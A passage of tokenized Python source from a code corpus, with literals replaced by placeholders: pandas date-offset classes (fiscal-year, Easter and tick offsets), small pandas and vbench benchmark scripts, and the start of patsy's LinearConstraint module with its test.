month ) <EOL> lastBDay = ( days_in_month - <EOL> max ( ( ( wkday + days_in_month - <NUM_LIT:1> ) % <NUM_LIT:7> ) - <NUM_LIT:4> , <NUM_LIT:0> ) ) <EOL> years = n <EOL> if n > <NUM_LIT:0> : <EOL> if ( other . month < self . month or <EOL> ( other . month == self . month and other . day < lastBDay ) ) : <EOL> years -= <NUM_LIT:1> <EOL> elif n <= <NUM_LIT:0> : <EOL> if ( other . month > self . month or <EOL> ( other . month == self . month and other . day > lastBDay ) ) : <EOL> years += <NUM_LIT:1> <EOL> other = other + relativedelta ( years = years ) <EOL> _ , days_in_month = tslib . monthrange ( other . year , self . month ) <EOL> result = datetime ( other . year , self . month , days_in_month , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> if result . weekday ( ) > <NUM_LIT:4> : <EOL> result = result - BDay ( ) <EOL> return result <EOL> class BYearBegin ( YearOffset ) : <EOL> """<STR_LIT>""" <EOL> _outputName = '<STR_LIT>' <EOL> _default_month = <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> wkday , days_in_month = tslib . monthrange ( other . year , self . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> years = n <EOL> if n > <NUM_LIT:0> : <EOL> if ( other . month < self . month or <EOL> ( other . month == self . month and other . day < first ) ) : <EOL> years -= <NUM_LIT:1> <EOL> elif n <= <NUM_LIT:0> : <EOL> if ( other . month > self . month or <EOL> ( other . month == self . month and other . day > first ) ) : <EOL> years += <NUM_LIT:1> <EOL> other = other + relativedelta ( years = years ) <EOL> wkday , days_in_month = tslib . monthrange ( other . year , self . month ) <EOL> first = _get_firstbday ( wkday ) <EOL> return datetime ( other . year , self . month , first , other . hour , <EOL> other . minute , other . second , other . 
microsecond ) <EOL> class YearEnd ( YearOffset ) : <EOL> """<STR_LIT>""" <EOL> _default_month = <NUM_LIT:12> <EOL> _prefix = '<STR_LIT:A>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> def _increment ( date ) : <EOL> if date . month == self . month : <EOL> _ , days_in_month = tslib . monthrange ( date . year , self . month ) <EOL> if date . day != days_in_month : <EOL> year = date . year <EOL> else : <EOL> year = date . year + <NUM_LIT:1> <EOL> elif date . month < self . month : <EOL> year = date . year <EOL> else : <EOL> year = date . year + <NUM_LIT:1> <EOL> _ , days_in_month = tslib . monthrange ( year , self . month ) <EOL> return datetime ( year , self . month , days_in_month , <EOL> date . hour , date . minute , date . second , <EOL> date . microsecond ) <EOL> def _decrement ( date ) : <EOL> year = date . year if date . month > self . month else date . year - <NUM_LIT:1> <EOL> _ , days_in_month = tslib . monthrange ( year , self . month ) <EOL> return datetime ( year , self . month , days_in_month , <EOL> date . hour , date . minute , date . second , <EOL> date . microsecond ) <EOL> def _rollf ( date ) : <EOL> if date . month != self . month or date . day < tslib . monthrange ( date . year , date . month ) [ <NUM_LIT:1> ] : <EOL> date = _increment ( date ) <EOL> return date <EOL> n = self . n <EOL> result = other <EOL> if n > <NUM_LIT:0> : <EOL> while n > <NUM_LIT:0> : <EOL> result = _increment ( result ) <EOL> n -= <NUM_LIT:1> <EOL> elif n < <NUM_LIT:0> : <EOL> while n < <NUM_LIT:0> : <EOL> result = _decrement ( result ) <EOL> n += <NUM_LIT:1> <EOL> else : <EOL> result = _rollf ( result ) <EOL> return result <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> return self . _end_apply_index ( i , self . freqstr ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> wkday , days_in_month = tslib . monthrange ( dt . year , self . month ) <EOL> return self . 
month == dt . month and dt . day == days_in_month <EOL> class YearBegin ( YearOffset ) : <EOL> """<STR_LIT>""" <EOL> _default_month = <NUM_LIT:1> <EOL> _prefix = '<STR_LIT>' <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> def _increment ( date , n ) : <EOL> year = date . year + n - <NUM_LIT:1> <EOL> if date . month >= self . month : <EOL> year += <NUM_LIT:1> <EOL> return datetime ( year , self . month , <NUM_LIT:1> , date . hour , date . minute , <EOL> date . second , date . microsecond ) <EOL> def _decrement ( date , n ) : <EOL> year = date . year + n + <NUM_LIT:1> <EOL> if date . month < self . month or ( date . month == self . month and <EOL> date . day == <NUM_LIT:1> ) : <EOL> year -= <NUM_LIT:1> <EOL> return datetime ( year , self . month , <NUM_LIT:1> , date . hour , date . minute , <EOL> date . second , date . microsecond ) <EOL> def _rollf ( date ) : <EOL> if ( date . month != self . month ) or date . day > <NUM_LIT:1> : <EOL> date = _increment ( date , <NUM_LIT:1> ) <EOL> return date <EOL> n = self . n <EOL> result = other <EOL> if n > <NUM_LIT:0> : <EOL> result = _increment ( result , n ) <EOL> elif n < <NUM_LIT:0> : <EOL> result = _decrement ( result , n ) <EOL> else : <EOL> result = _rollf ( result ) <EOL> return result <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> freq_month = <NUM_LIT:12> if self . month == <NUM_LIT:1> else self . month - <NUM_LIT:1> <EOL> freqstr = '<STR_LIT>' % ( _int_to_month [ freq_month ] , ) <EOL> return self . _beg_apply_index ( i , freqstr ) <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return dt . month == self . month and dt . 
day == <NUM_LIT:1> <EOL> class FY5253 ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT>' <EOL> _suffix_prefix_last = '<STR_LIT:L>' <EOL> _suffix_prefix_nearest = '<STR_LIT:N>' <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . startingMonth = kwds [ '<STR_LIT>' ] <EOL> self . weekday = kwds [ "<STR_LIT>" ] <EOL> self . variation = kwds [ "<STR_LIT>" ] <EOL> self . kwds = kwds <EOL> if self . n == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if self . variation not in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> raise ValueError ( '<STR_LIT>' % self . variation ) <EOL> if self . variation == "<STR_LIT>" : <EOL> weekday_offset = weekday ( self . weekday ) <EOL> self . _rd_forward = relativedelta ( weekday = weekday_offset ) <EOL> self . _rd_backward = relativedelta ( weekday = weekday_offset ( - <NUM_LIT:1> ) ) <EOL> else : <EOL> self . _offset_lwom = LastWeekOfMonth ( n = <NUM_LIT:1> , weekday = self . weekday ) <EOL> def isAnchored ( self ) : <EOL> return self . n == <NUM_LIT:1> and self . startingMonth is not None and self . weekday is not None <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> dt = datetime ( dt . year , dt . month , dt . day ) <EOL> year_end = self . get_year_end ( dt ) <EOL> if self . variation == "<STR_LIT>" : <EOL> return year_end == dt or self . get_year_end ( dt - relativedelta ( months = <NUM_LIT:1> ) ) == dt <EOL> else : <EOL> return year_end == dt <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> n = self . n <EOL> prev_year = self . get_year_end ( <EOL> datetime ( other . year - <NUM_LIT:1> , self . startingMonth , <NUM_LIT:1> ) ) <EOL> cur_year = self . get_year_end ( <EOL> datetime ( other . year , self . startingMonth , <NUM_LIT:1> ) ) <EOL> next_year = self . get_year_end ( <EOL> datetime ( other . 
year + <NUM_LIT:1> , self . startingMonth , <NUM_LIT:1> ) ) <EOL> prev_year = tslib . _localize_pydatetime ( prev_year , other . tzinfo ) <EOL> cur_year = tslib . _localize_pydatetime ( cur_year , other . tzinfo ) <EOL> next_year = tslib . _localize_pydatetime ( next_year , other . tzinfo ) <EOL> if n > <NUM_LIT:0> : <EOL> if other == prev_year : <EOL> year = other . year - <NUM_LIT:1> <EOL> elif other == cur_year : <EOL> year = other . year <EOL> elif other == next_year : <EOL> year = other . year + <NUM_LIT:1> <EOL> elif other < prev_year : <EOL> year = other . year - <NUM_LIT:1> <EOL> n -= <NUM_LIT:1> <EOL> elif other < cur_year : <EOL> year = other . year <EOL> n -= <NUM_LIT:1> <EOL> elif other < next_year : <EOL> year = other . year + <NUM_LIT:1> <EOL> n -= <NUM_LIT:1> <EOL> else : <EOL> assert False <EOL> result = self . get_year_end ( <EOL> datetime ( year + n , self . startingMonth , <NUM_LIT:1> ) ) <EOL> result = datetime ( result . year , result . month , result . day , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> return result <EOL> else : <EOL> n = - n <EOL> if other == prev_year : <EOL> year = other . year - <NUM_LIT:1> <EOL> elif other == cur_year : <EOL> year = other . year <EOL> elif other == next_year : <EOL> year = other . year + <NUM_LIT:1> <EOL> elif other > next_year : <EOL> year = other . year + <NUM_LIT:1> <EOL> n -= <NUM_LIT:1> <EOL> elif other > cur_year : <EOL> year = other . year <EOL> n -= <NUM_LIT:1> <EOL> elif other > prev_year : <EOL> year = other . year - <NUM_LIT:1> <EOL> n -= <NUM_LIT:1> <EOL> else : <EOL> assert False <EOL> result = self . get_year_end ( <EOL> datetime ( year - n , self . startingMonth , <NUM_LIT:1> ) ) <EOL> result = datetime ( result . year , result . month , result . day , <EOL> other . hour , other . minute , other . second , <EOL> other . microsecond ) <EOL> return result <EOL> def get_year_end ( self , dt ) : <EOL> if self . 
variation == "<STR_LIT>" : <EOL> return self . _get_year_end_nearest ( dt ) <EOL> else : <EOL> return self . _get_year_end_last ( dt ) <EOL> def get_target_month_end ( self , dt ) : <EOL> target_month = datetime ( <EOL> dt . year , self . startingMonth , <NUM_LIT:1> , tzinfo = dt . tzinfo ) <EOL> next_month_first_of = target_month + relativedelta ( months = + <NUM_LIT:1> ) <EOL> return next_month_first_of + relativedelta ( days = - <NUM_LIT:1> ) <EOL> def _get_year_end_nearest ( self , dt ) : <EOL> target_date = self . get_target_month_end ( dt ) <EOL> if target_date . weekday ( ) == self . weekday : <EOL> return target_date <EOL> else : <EOL> forward = target_date + self . _rd_forward <EOL> backward = target_date + self . _rd_backward <EOL> if forward - target_date < target_date - backward : <EOL> return forward <EOL> else : <EOL> return backward <EOL> def _get_year_end_last ( self , dt ) : <EOL> current_year = datetime ( <EOL> dt . year , self . startingMonth , <NUM_LIT:1> , tzinfo = dt . tzinfo ) <EOL> return current_year + self . _offset_lwom <EOL> @ property <EOL> def rule_code ( self ) : <EOL> suffix = self . get_rule_code_suffix ( ) <EOL> return "<STR_LIT>" % ( self . _get_prefix ( ) , suffix ) <EOL> def _get_prefix ( self ) : <EOL> return self . _prefix <EOL> def _get_suffix_prefix ( self ) : <EOL> if self . variation == "<STR_LIT>" : <EOL> return self . _suffix_prefix_nearest <EOL> else : <EOL> return self . _suffix_prefix_last <EOL> def get_rule_code_suffix ( self ) : <EOL> return '<STR_LIT>' % ( self . _get_suffix_prefix ( ) , <EOL> _int_to_month [ self . startingMonth ] , <EOL> _int_to_weekday [ self . 
weekday ] ) <EOL> @ classmethod <EOL> def _parse_suffix ( cls , varion_code , startingMonth_code , weekday_code ) : <EOL> if varion_code == "<STR_LIT:N>" : <EOL> variation = "<STR_LIT>" <EOL> elif varion_code == "<STR_LIT:L>" : <EOL> variation = "<STR_LIT>" <EOL> else : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % ( varion_code , ) ) <EOL> startingMonth = _month_to_int [ startingMonth_code ] <EOL> weekday = _weekday_to_int [ weekday_code ] <EOL> return { <EOL> "<STR_LIT>" : weekday , <EOL> "<STR_LIT>" : startingMonth , <EOL> "<STR_LIT>" : variation , <EOL> } <EOL> @ classmethod <EOL> def _from_name ( cls , * args ) : <EOL> return cls ( ** cls . _parse_suffix ( * args ) ) <EOL> class FY5253Quarter ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT>' <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = n <EOL> self . normalize = normalize <EOL> self . qtr_with_extra_week = kwds [ "<STR_LIT>" ] <EOL> self . kwds = kwds <EOL> if self . n == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _offset = FY5253 ( <EOL> startingMonth = kwds [ '<STR_LIT>' ] , <EOL> weekday = kwds [ "<STR_LIT>" ] , <EOL> variation = kwds [ "<STR_LIT>" ] ) <EOL> def isAnchored ( self ) : <EOL> return self . n == <NUM_LIT:1> and self . _offset . isAnchored ( ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> base = other <EOL> n = self . n <EOL> if n > <NUM_LIT:0> : <EOL> while n > <NUM_LIT:0> : <EOL> if not self . _offset . onOffset ( other ) : <EOL> qtr_lens = self . get_weeks ( other ) <EOL> start = other - self . _offset <EOL> else : <EOL> start = other <EOL> qtr_lens = self . get_weeks ( other + self . _offset ) <EOL> for weeks in qtr_lens : <EOL> start += relativedelta ( weeks = weeks ) <EOL> if start > other : <EOL> other = start <EOL> n -= <NUM_LIT:1> <EOL> break <EOL> else : <EOL> n = - n <EOL> while n > <NUM_LIT:0> : <EOL> if not self . _offset . 
onOffset ( other ) : <EOL> qtr_lens = self . get_weeks ( other ) <EOL> end = other + self . _offset <EOL> else : <EOL> end = other <EOL> qtr_lens = self . get_weeks ( other ) <EOL> for weeks in reversed ( qtr_lens ) : <EOL> end -= relativedelta ( weeks = weeks ) <EOL> if end < other : <EOL> other = end <EOL> n -= <NUM_LIT:1> <EOL> break <EOL> other = datetime ( other . year , other . month , other . day , <EOL> base . hour , base . minute , base . second , base . microsecond ) <EOL> return other <EOL> def get_weeks ( self , dt ) : <EOL> ret = [ <NUM_LIT> ] * <NUM_LIT:4> <EOL> year_has_extra_week = self . year_has_extra_week ( dt ) <EOL> if year_has_extra_week : <EOL> ret [ self . qtr_with_extra_week - <NUM_LIT:1> ] = <NUM_LIT> <EOL> return ret <EOL> def year_has_extra_week ( self , dt ) : <EOL> if self . _offset . onOffset ( dt ) : <EOL> prev_year_end = dt - self . _offset <EOL> next_year_end = dt <EOL> else : <EOL> next_year_end = dt + self . _offset <EOL> prev_year_end = dt - self . _offset <EOL> week_in_year = ( next_year_end - prev_year_end ) . days / <NUM_LIT:7> <EOL> return week_in_year == <NUM_LIT> <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> if self . _offset . onOffset ( dt ) : <EOL> return True <EOL> next_year_end = dt - self . _offset <EOL> qtr_lens = self . get_weeks ( dt ) <EOL> current = next_year_end <EOL> for qtr_len in qtr_lens [ <NUM_LIT:0> : <NUM_LIT:4> ] : <EOL> current += relativedelta ( weeks = qtr_len ) <EOL> if dt == current : <EOL> return True <EOL> return False <EOL> @ property <EOL> def rule_code ( self ) : <EOL> suffix = self . _offset . get_rule_code_suffix ( ) <EOL> return "<STR_LIT>" % ( self . _prefix , <EOL> "<STR_LIT>" % ( suffix , self . qtr_with_extra_week ) ) <EOL> @ classmethod <EOL> def _from_name ( cls , * args ) : <EOL> return cls ( ** dict ( FY5253 . 
_parse_suffix ( * args [ : - <NUM_LIT:1> ] ) , <EOL> qtr_with_extra_week = int ( args [ - <NUM_LIT:1> ] ) ) ) <EOL> class Easter ( DateOffset ) : <EOL> """<STR_LIT>""" <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , ** kwds ) : <EOL> super ( Easter , self ) . __init__ ( n , ** kwds ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> currentEaster = easter ( other . year ) <EOL> currentEaster = datetime ( <EOL> currentEaster . year , currentEaster . month , currentEaster . day ) <EOL> currentEaster = tslib . _localize_pydatetime ( currentEaster , other . tzinfo ) <EOL> if self . n >= <NUM_LIT:0> : <EOL> if other >= currentEaster : <EOL> new = easter ( other . year + self . n ) <EOL> else : <EOL> new = easter ( other . year + self . n - <NUM_LIT:1> ) <EOL> else : <EOL> if other > currentEaster : <EOL> new = easter ( other . year + self . n + <NUM_LIT:1> ) <EOL> else : <EOL> new = easter ( other . year + self . n ) <EOL> new = datetime ( new . year , new . month , new . day , other . hour , <EOL> other . minute , other . second , other . microsecond ) <EOL> return new <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> return date ( dt . year , dt . month , dt . day ) == easter ( dt . year ) <EOL> def _tick_comp ( op ) : <EOL> def f ( self , other ) : <EOL> return op ( self . delta , other . delta ) <EOL> return f <EOL> class Tick ( SingleConstructorOffset ) : <EOL> _inc = Timedelta ( microseconds = <NUM_LIT:1000> ) <EOL> __gt__ = _tick_comp ( operator . gt ) <EOL> __ge__ = _tick_comp ( operator . ge ) <EOL> __lt__ = _tick_comp ( operator . lt ) <EOL> __le__ = _tick_comp ( operator . le ) <EOL> __eq__ = _tick_comp ( operator . eq ) <EOL> __ne__ = _tick_comp ( operator . ne ) <EOL> def __add__ ( self , other ) : <EOL> if isinstance ( other , Tick ) : <EOL> if type ( self ) == type ( other ) : <EOL> return type ( self ) ( self . n + other . 
n ) <EOL> else : <EOL> return _delta_to_tick ( self . delta + other . delta ) <EOL> try : <EOL> return self . apply ( other ) <EOL> except ApplyTypeError : <EOL> return NotImplemented <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , compat . string_types ) : <EOL> from pandas . tseries . frequencies import to_offset <EOL> other = to_offset ( other ) <EOL> if isinstance ( other , Tick ) : <EOL> return self . delta == other . delta <EOL> else : <EOL> return DateOffset . __eq__ ( self , other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _params ( ) ) <EOL> def __ne__ ( self , other ) : <EOL> if isinstance ( other , compat . string_types ) : <EOL> from pandas . tseries . frequencies import to_offset <EOL> other = to_offset ( other ) <EOL> if isinstance ( other , Tick ) : <EOL> return self . delta != other . delta <EOL> else : <EOL> return DateOffset . __ne__ ( self , other ) <EOL> @ property <EOL> def delta ( self ) : <EOL> return self . n * self . _inc <EOL> @ property <EOL> def nanos ( self ) : <EOL> return _delta_to_nanoseconds ( self . delta ) <EOL> def apply ( self , other ) : <EOL> if isinstance ( other , ( datetime , np . datetime64 , date ) ) : <EOL> return as_timestamp ( other ) + self <EOL> if isinstance ( other , timedelta ) : <EOL> return other + self . delta <EOL> elif isinstance ( other , type ( self ) ) : <EOL> return type ( self ) ( self . n + other . n ) <EOL> else : <EOL> raise ApplyTypeError ( '<STR_LIT>' % type ( other ) . __name__ ) <EOL> _prefix = '<STR_LIT>' <EOL> def isAnchored ( self ) : <EOL> return False <EOL> def _delta_to_tick ( delta ) : <EOL> if delta . microseconds == <NUM_LIT:0> : <EOL> if delta . seconds == <NUM_LIT:0> : <EOL> return Day ( delta . days ) <EOL> else : <EOL> seconds = delta . days * <NUM_LIT> + delta . 
seconds <EOL> if seconds % <NUM_LIT> == <NUM_LIT:0> : <EOL> return Hour ( seconds / <NUM_LIT> ) <EOL> elif seconds % <NUM_LIT> == <NUM_LIT:0> : <EOL> return Minute ( seconds / <NUM_LIT> ) <EOL> else : <EOL> return Second ( seconds ) <EOL> else : <EOL> nanos = _delta_to_nanoseconds ( delta ) <EOL> if nanos % <NUM_LIT> == <NUM_LIT:0> : <EOL> return Milli ( nanos // <NUM_LIT> ) <EOL> elif nanos % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> return Micro ( nanos // <NUM_LIT:1000> ) <EOL> else : <EOL> return Nano ( nanos ) <EOL> _delta_to_nanoseconds = tslib . _delta_to_nanoseconds <EOL> class Day ( Tick ) : <EOL> _inc = Timedelta ( days = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:D>' <EOL> class Hour ( Tick ) : <EOL> _inc = Timedelta ( hours = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:H>' <EOL> class Minute ( Tick ) : <EOL> _inc = Timedelta ( minutes = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:T>' <EOL> class Second ( Tick ) : <EOL> _inc = Timedelta ( seconds = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:S>' <EOL> class Milli ( Tick ) : <EOL> _inc = Timedelta ( milliseconds = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:L>' <EOL> class Micro ( Tick ) : <EOL> _inc = Timedelta ( microseconds = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT>' <EOL> class Nano ( Tick ) : <EOL> _inc = Timedelta ( nanoseconds = <NUM_LIT:1> ) <EOL> _prefix = '<STR_LIT:N>' <EOL> BDay = BusinessDay <EOL> BMonthEnd = BusinessMonthEnd <EOL> BMonthBegin = BusinessMonthBegin <EOL> CBMonthEnd = CustomBusinessMonthEnd <EOL> CBMonthBegin = CustomBusinessMonthBegin <EOL> CDay = CustomBusinessDay <EOL> def _get_firstbday ( wkday ) : <EOL> """<STR_LIT>""" <EOL> first = <NUM_LIT:1> <EOL> if wkday == <NUM_LIT:5> : <EOL> first = <NUM_LIT:3> <EOL> elif wkday == <NUM_LIT:6> : <EOL> first = <NUM_LIT:2> <EOL> return first <EOL> def generate_range ( start = None , end = None , periods = None , <EOL> offset = BDay ( ) , time_rule = None ) : <EOL> """<STR_LIT>""" <EOL> if time_rule is not None : <EOL> from pandas . tseries . 
frequencies import get_offset <EOL> offset = get_offset ( time_rule ) <EOL> start = to_datetime ( start ) <EOL> end = to_datetime ( end ) <EOL> if start and not offset . onOffset ( start ) : <EOL> start = offset . rollforward ( start ) <EOL> elif end and not offset . onOffset ( end ) : <EOL> end = offset . rollback ( end ) <EOL> if periods is None and end < start : <EOL> end = None <EOL> periods = <NUM_LIT:0> <EOL> if end is None : <EOL> end = start + ( periods - <NUM_LIT:1> ) * offset <EOL> if start is None : <EOL> start = end - ( periods - <NUM_LIT:1> ) * offset <EOL> cur = start <EOL> if offset . n >= <NUM_LIT:0> : <EOL> while cur <= end : <EOL> yield cur <EOL> next_date = offset . apply ( cur ) <EOL> if next_date <= cur : <EOL> raise ValueError ( '<STR_LIT>' % offset ) <EOL> cur = next_date <EOL> else : <EOL> while cur >= end : <EOL> yield cur <EOL> next_date = offset . apply ( cur ) <EOL> if next_date >= cur : <EOL> raise ValueError ( '<STR_LIT>' % offset ) <EOL> cur = next_date <EOL> prefix_mapping = dict ( ( offset . _prefix , offset ) for offset in [ <EOL> YearBegin , <EOL> YearEnd , <EOL> BYearBegin , <EOL> BYearEnd , <EOL> BusinessDay , <EOL> BusinessMonthBegin , <EOL> BusinessMonthEnd , <EOL> BQuarterEnd , <EOL> BQuarterBegin , <EOL> BusinessHour , <EOL> CustomBusinessDay , <EOL> CustomBusinessMonthEnd , <EOL> CustomBusinessMonthBegin , <EOL> CustomBusinessHour , <EOL> MonthEnd , <EOL> MonthBegin , <EOL> Week , <EOL> Second , <EOL> Minute , <EOL> Micro , <EOL> QuarterEnd , <EOL> QuarterBegin , <EOL> Milli , <EOL> Hour , <EOL> Day , <EOL> WeekOfMonth , <EOL> FY5253 , <EOL> FY5253Quarter , <EOL> ] ) <EOL> prefix_mapping [ '<STR_LIT:N>' ] = Nano </s>
<s> from pandas import * <EOL> from pandas . compat import range <EOL> try : <EOL> import pandas . core . internals as internals <EOL> reload ( internals ) <EOL> import pandas . core . frame as frame <EOL> reload ( frame ) <EOL> from pandas . core . frame import DataFrame as DataMatrix <EOL> except ImportError : <EOL> pass <EOL> N = <NUM_LIT:1000> <EOL> K = <NUM_LIT> <EOL> def horribly_unconsolidated ( ) : <EOL> index = np . arange ( N ) <EOL> df = DataMatrix ( index = index ) <EOL> for i in range ( K ) : <EOL> df [ i ] = float ( K ) <EOL> return df <EOL> def bench_reindex_index ( df , it = <NUM_LIT:100> ) : <EOL> new_idx = np . arange ( <NUM_LIT:0> , N , <NUM_LIT:2> ) <EOL> for i in range ( it ) : <EOL> df . reindex ( new_idx ) <EOL> def bench_reindex_columns ( df , it = <NUM_LIT:100> ) : <EOL> new_cols = np . arange ( <NUM_LIT:0> , K , <NUM_LIT:2> ) <EOL> for i in range ( it ) : <EOL> df . reindex ( columns = new_cols ) <EOL> def bench_join_index ( df , it = <NUM_LIT:10> ) : <EOL> left = df . reindex ( index = np . arange ( <NUM_LIT:0> , N , <NUM_LIT:2> ) , <EOL> columns = np . arange ( K // <NUM_LIT:2> ) ) <EOL> right = df . reindex ( columns = np . arange ( K // <NUM_LIT:2> + <NUM_LIT:1> , K ) ) <EOL> for i in range ( it ) : <EOL> joined = left . join ( right ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> df = horribly_unconsolidated ( ) <EOL> left = df . reindex ( index = np . arange ( <NUM_LIT:0> , N , <NUM_LIT:2> ) , <EOL> columns = np . arange ( K // <NUM_LIT:2> ) ) <EOL> right = df . reindex ( columns = np . arange ( K // <NUM_LIT:2> + <NUM_LIT:1> , K ) ) <EOL> bench_join_index ( df ) </s>
<s> from vbench . api import Benchmark <EOL> from datetime import datetime <EOL> common_setup = """<STR_LIT>""" <EOL> setup = common_setup + """<STR_LIT>""" <EOL> panel_shift = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:12> ) ) <EOL> panel_shift_minor = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:12> ) ) <EOL> panel_pct_change_major = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> ) ) <EOL> panel_pct_change_minor = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> ) ) <EOL> panel_pct_change_items = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> ) ) </s>
<s> from __future__ import print_function <EOL> __all__ = [ "<STR_LIT>" ] <EOL> import re <EOL> import six <EOL> import numpy as np <EOL> from patsy import PatsyError <EOL> from patsy . origin import Origin <EOL> from patsy . util import ( atleast_2d_column_default , <EOL> repr_pretty_delegate , repr_pretty_impl , <EOL> SortAnythingKey , <EOL> no_pickling , assert_no_pickling ) <EOL> from patsy . infix_parser import Token , Operator , ParseNode , infix_parse <EOL> from patsy . compat import Scanner , Mapping <EOL> class LinearConstraint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , variable_names , coefs , constants = None ) : <EOL> self . variable_names = list ( variable_names ) <EOL> self . coefs = np . atleast_2d ( np . asarray ( coefs , dtype = float ) ) <EOL> if constants is None : <EOL> constants = np . zeros ( self . coefs . shape [ <NUM_LIT:0> ] , dtype = float ) <EOL> constants = np . asarray ( constants , dtype = float ) <EOL> self . constants = atleast_2d_column_default ( constants ) <EOL> if self . constants . ndim != <NUM_LIT:2> or self . constants . shape [ <NUM_LIT:1> ] != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . coefs . ndim != <NUM_LIT:2> or self . coefs . shape [ <NUM_LIT:1> ] != len ( variable_names ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . coefs . shape [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . coefs . shape [ <NUM_LIT:0> ] != self . constants . shape [ <NUM_LIT:0> ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if np . any ( np . all ( self . coefs == <NUM_LIT:0> , axis = <NUM_LIT:1> ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> __repr__ = repr_pretty_delegate <EOL> def _repr_pretty_ ( self , p , cycle ) : <EOL> assert not cycle <EOL> return repr_pretty_impl ( p , self , <EOL> [ self . variable_names , self . coefs , self . 
constants ] ) <EOL> __getstate__ = no_pickling <EOL> @ classmethod <EOL> def combine ( cls , constraints ) : <EOL> """<STR_LIT>""" <EOL> if not constraints : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> variable_names = constraints [ <NUM_LIT:0> ] . variable_names <EOL> for constraint in constraints : <EOL> if constraint . variable_names != variable_names : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> coefs = np . row_stack ( [ c . coefs for c in constraints ] ) <EOL> constants = np . row_stack ( [ c . constants for c in constraints ] ) <EOL> return cls ( variable_names , coefs , constants ) <EOL> def test_LinearConstraint ( ) : <EOL> from numpy . testing . utils import assert_equal <EOL> lc = LinearConstraint ( [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> assert lc . variable_names == [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] <EOL> assert_equal ( lc . coefs , [ [ <NUM_LIT:1> , <NUM_LIT:1> ] ] ) <EOL> assert_equal ( lc . constants , [ [ <NUM_LIT:0> ] ] ) <EOL> lc = LinearConstraint ( [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ] , [ <NUM_LIT:10> , <NUM_LIT:20> ] ) <EOL> assert_equal ( lc . coefs , [ [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ] ) <EOL> assert_equal ( lc . constants , [ [ <NUM_LIT:10> ] , [ <NUM_LIT:20> ] ] ) <EOL> assert lc . coefs . dtype == np . dtype ( float ) <EOL> assert lc . constants . dtype == np . dtype ( float ) <EOL> from nose . 
